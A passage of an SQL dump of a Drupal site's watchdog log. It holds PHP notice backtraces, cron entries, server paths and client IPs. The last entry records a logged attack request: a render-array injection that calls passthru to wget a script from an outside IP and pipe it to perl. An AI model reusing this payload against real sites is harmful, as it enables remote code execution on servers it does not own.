Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580453416),(4627,0,'cron','Starting execution of @module_cron().',_binary 'a:1:{s:7:\"@module\";s:7:\"comment\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4628,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"dblog\";s:16:\"@module_previous\";s:7:\"comment\";s:5:\"@time\";s:7:\"16.53ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4629,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:5:\"field\";s:16:\"@module_previous\";s:5:\"dblog\";s:5:\"@time\";s:6:\"7.64ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4630,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"file\";s:16:\"@module_previous\";s:5:\"field\";s:5:\"@time\";s:7:\"19.77ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4631,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:7:\"history\";s:16:\"@module_previous\";s:4:\"file\";s:5:\"@time\";s:7:\"72.44ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4632,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:8:\"honeypot\";s:16:\"@module_previous\";s:7:\"history\";s:5:\"@time\";s:6:\"1.79ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4633,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"locale\";s:16:\"@module_previous\";s:8:\"honeypot\";s:5:\"@time\";s:6:\"4.75ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4634,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:4:\"node\";s:16:\"@module_previous\";s:6:\"locale\";s:5:\"@time\";s:6:\"0.76ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4635,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"search\";s:16:\"@module_previous\";s:4:\"node\";s:5:\"@time\";s:6:\"9.32ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4636,0,'cron','Starting execution of @module_cron(), execution of @module_previous_cron() took @time.',_binary 'a:3:{s:7:\"@module\";s:6:\"system\";s:16:\"@module_previous\";s:6:\"search\";s:5:\"@time\";s:7:\"25.66ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4637,0,'cron','Execution of @module_previous_cron() took @time.',_binary 'a:2:{s:16:\"@module_previous\";s:6:\"system\";s:5:\"@time\";s:6:\"51.7ms\";}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4638,0,'cron','Cron run completed.',_binary 'a:0:{}',5,'','http://clidentcastelo.pt/?fbclid=IwAR3xXhejk6kR8ulsXhVpHDZKt5sRpBqc2P3Y4Gy7AAkLm_FGGYmink5c-rM','','173.252.127.23',1580453753),(4639,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580454717),(4640,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580454717),(4641,0,'access denied','@uri',_binary 'a:1:{s:4:\"@uri\";s:156:\"/user/register/?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23markup%5D=wget+-qO+-+89.40.126.224%2Fpot%7Cperl&name%5B%23type%5D=markup\";}',4,'','http://clidentcastelo.pt/user/register/?q=user%2Fpassword','','217.61.2.187',1580464194),